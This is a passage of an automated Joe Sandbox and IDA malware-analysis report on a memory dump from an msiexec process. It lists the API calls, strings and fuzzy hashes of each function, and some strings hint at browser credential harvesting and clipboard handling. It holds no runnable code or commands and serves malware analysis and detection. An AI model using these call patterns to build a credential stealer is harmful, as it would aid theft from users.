                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                            • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004095FC
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3655998216-0
                                                                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00445426
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1828521557-0
                                                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                              • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                            • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@FilePointermemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 609303285-0
                                                                                                            • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                            • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                            • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                            • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2136311172-0
                                                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@??3@
                                                                                                            • String ID:
                                                                                                            • API String ID: 1936579350-0
                                                                                                            • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                            • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1294909896-0
                                                                                                            • Opcode ID: 4de95ac81b56fc95cb4562d00445ef5fa655241d3aefb31a5f850866e19148c6
                                                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                            • Opcode Fuzzy Hash: 4de95ac81b56fc95cb4562d00445ef5fa655241d3aefb31a5f850866e19148c6
                                                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1294909896-0
                                                                                                            • Opcode ID: d947284d6c22db8237c76381862de6f07fb40d788dfda0aa2648abdb68a845b9
                                                                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                            • Opcode Fuzzy Hash: d947284d6c22db8237c76381862de6f07fb40d788dfda0aa2648abdb68a845b9
                                                                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1294909896-0
                                                                                                            • Opcode ID: e156b31a0a4016bb8d4295fdb5f94758c26aaa1bdb159141442c644a924158d2
                                                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                            • Opcode Fuzzy Hash: e156b31a0a4016bb8d4295fdb5f94758c26aaa1bdb159141442c644a924158d2
                                                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                            APIs
                                                                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                            • GetLastError.KERNEL32 ref: 00409974
                                                                                                            • CloseClipboard.USER32 ref: 0040997D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3604893535-0
                                                                                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                            APIs
                                                                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                            • API String ID: 2780580303-317687271
                                                                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                            APIs
                                                                                                            • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                            • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 4218492932-0
                                                                                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                            APIs
                                                                                                            • EmptyClipboard.USER32 ref: 00409882
                                                                                                            • wcslen.MSVCRT ref: 0040988F
                                                                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                            • CloseClipboard.USER32 ref: 004098D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1213725291-0
                                                                                                            • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                            • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                            • free.MSVCRT ref: 00418370
                                                                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                            • String ID: OsError 0x%x (%u)
                                                                                                            • API String ID: 2360000266-2664311388
                                                                                                            • Opcode ID: 78d2135784b36f3903f9871ee7adf38e4db2590f8e5e3f290b233798c2ec08b4
                                                                                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                            • Opcode Fuzzy Hash: 78d2135784b36f3903f9871ee7adf38e4db2590f8e5e3f290b233798c2ec08b4
                                                                                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                            APIs
                                                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                            • OpenClipboard.USER32(?), ref: 00411878
                                                                                                            • GetLastError.KERNEL32 ref: 0041188D
                                                                                                              • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                              • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                              • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                              • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                              • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                              • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                              • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                              • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                              • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2628231878-0
                                                                                                            • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                            • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                            • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                            • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@??3@memcpymemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1865533344-0
                                                                                                            • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                            • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                            • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                            • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                            APIs
                                                                                                            • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Version
                                                                                                            • String ID:
                                                                                                            • API String ID: 1889659487-0
                                                                                                            • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                            • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                            • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                            • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                            APIs
                                                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NtdllProc_Window
                                                                                                            • String ID:
                                                                                                            • API String ID: 4255912815-0
                                                                                                            • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                            • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                            • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                            • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                            APIs
                                                                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                            • memset.MSVCRT ref: 0040265F
                                                                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                            • API String ID: 577499730-1134094380
                                                                                                            • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                            • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                            • String ID: :stringdata$ftp://$http://$https://
                                                                                                            • API String ID: 2787044678-1921111777
                                                                                                            • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                            • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                            • GetDC.USER32 ref: 004140E3
